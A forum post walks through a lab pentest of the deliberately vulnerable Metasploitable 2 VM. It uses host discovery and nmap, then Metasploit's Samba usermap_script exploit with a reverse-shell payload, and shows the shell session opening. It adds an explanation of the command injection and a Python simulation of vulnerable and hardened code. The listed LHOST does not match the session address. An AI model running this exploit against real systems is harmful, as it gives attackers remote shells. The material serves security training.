crossbower Posted February 1, 2014 (edited)

Pentest on Metasploitable 2

The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms.

root@kali:~# netdiscover -i wlan1 -r 192.168.1.1/24

 Currently scanning: 192.168.1.0/24   |   Screen View: Unique Hosts

 8 Captured ARP Req/Rep packets, from 8 hosts.   Total size: 372
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.1.91    08:00:27:4a:6c:50   01     042   CADMUS COMPUTER SYSTEMS
 192.168.1.202   08:00:27:32:43:96   01     042   CADMUS COMPUTER SYSTEMS
 192.168.1.1     00:25:53:3e:bc:b9   01     042   Unknown vendor
 192.168.1.100   00:09:f8:65:35:64   01     060   UNIMO TECHNOLOGY CO., LTD.
 192.168.1.132   00:21:9b:20:a3:bb   01     060   Unknown vendor

Using the nmap scanner to identify the Samba service on port 139:

root@kali:~# nmap -p 139 -sV 192.168.1.91

Starting Nmap 6.40 ( http://nmap.org )
Nmap scan report for 192.168.1.91
Host is up (0.00017s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:4A:6C:50 (Cadmus Computer Systems)

And play the game:

root@kali:~# service postgresql start && service metasploit start && msfconsole

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 192.168.1.91
RHOST => 192.168.1.91
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 191.168.1.19
LHOST => 191.168.1.19
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BgB1yKJSt3wbArQy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nBgB1yKJSt3wbArQy\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.19:4444 -> 192.168.1.91:42504)

VIDEO TUT: http://www.youtube.com/watch?v=S3uvS3qEpm8

Edited February 2, 2014 by crossbower
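The post shows the exploit working but not why it works. The module exploit/multi/samba/usermap_script targets CVE-2007-2447: when the vulnerable Samba versions had a "username map script" configured, smbd built the script's command line as one string containing the client-supplied username and handed it to /bin/sh, so a username carrying backticks ran arbitrary commands as the smbd user, with no valid credentials needed. The following is an added example, not code from the post or from Samba, that simulates that pattern locally in Python: run_map_script_vulnerable() joins script and username into a shell string the way the bug did, run_map_script_hardened() passes the username as a separate argv element with no shell, and is_valid_username() is the allowlist check a map-script caller should apply before invoking anything. The map script used (/bin/echo) and the attacker username are constructed stand-ins chosen so the difference shows in the output; they are assumptions of this example, not Metasploitable's real configuration.

```python
"""Added example: simulate the Samba "username map script" command
injection (CVE-2007-2447) and its hardened counterpart, offline.

Nothing here talks to a Samba server; it reproduces the vulnerable call
pattern with a local shell so the effect of the username is visible.
"""
import re
import subprocess

# Hypothetical map script. /bin/echo just prints its arguments, which makes
# it easy to see whether the username arrived as data or was executed.
MAP_SCRIPT = "/bin/echo"

# Constructed attacker username. The "/=`...`" shape mirrors the idea behind
# the Metasploit module: the part outside the backticks is a harmless map
# entry, and the backticked command is what the shell actually runs.
ATTACKER_USERNAME = "/=`echo INJECTED_COMMAND_RAN`"


def run_map_script_vulnerable(username: str) -> str:
    """Vulnerable pattern: script and username concatenated into a single
    command line and evaluated by /bin/sh. Double quotes do not help, since
    the shell still expands backticks inside them."""
    command = f'{MAP_SCRIPT} "{username}"'
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.strip()


def run_map_script_hardened(username: str) -> str:
    """Hardened pattern: no shell at all. The username is one argv element,
    so metacharacters reach the script as literal bytes."""
    result = subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True)
    return result.stdout.strip()


def is_valid_username(username: str) -> bool:
    """Allowlist check to apply before calling any map script: the
    conservative character set a real account name needs, nothing more.
    Defence in depth on top of the argv-based call, not a replacement."""
    return re.fullmatch(r"[A-Za-z0-9._-]{1,64}", username) is not None


if __name__ == "__main__":
    print("vulnerable:", run_map_script_vulnerable(ATTACKER_USERNAME))
    print("hardened  :", run_map_script_hardened(ATTACKER_USERNAME))
    for name in (ATTACKER_USERNAME, "msfadmin"):
        print(f"{name!r} acceptable as username: {is_valid_username(name)}")
```

Run it and the vulnerable path prints "/=INJECTED_COMMAND_RAN": the backticked command executed and its output was substituted into the line, which is exactly what the Metasploit module relies on, with the reverse-shell command in place of the echo. The hardened path prints the username verbatim, backticks included, because no shell ever parsed it. The allowlist rejects the attacker string and accepts an ordinary name such as msfadmin. Both the argv-only call and the allowlist are needed: the first removes the shell, the second keeps a hostile name from reaching whatever the script itself does with it.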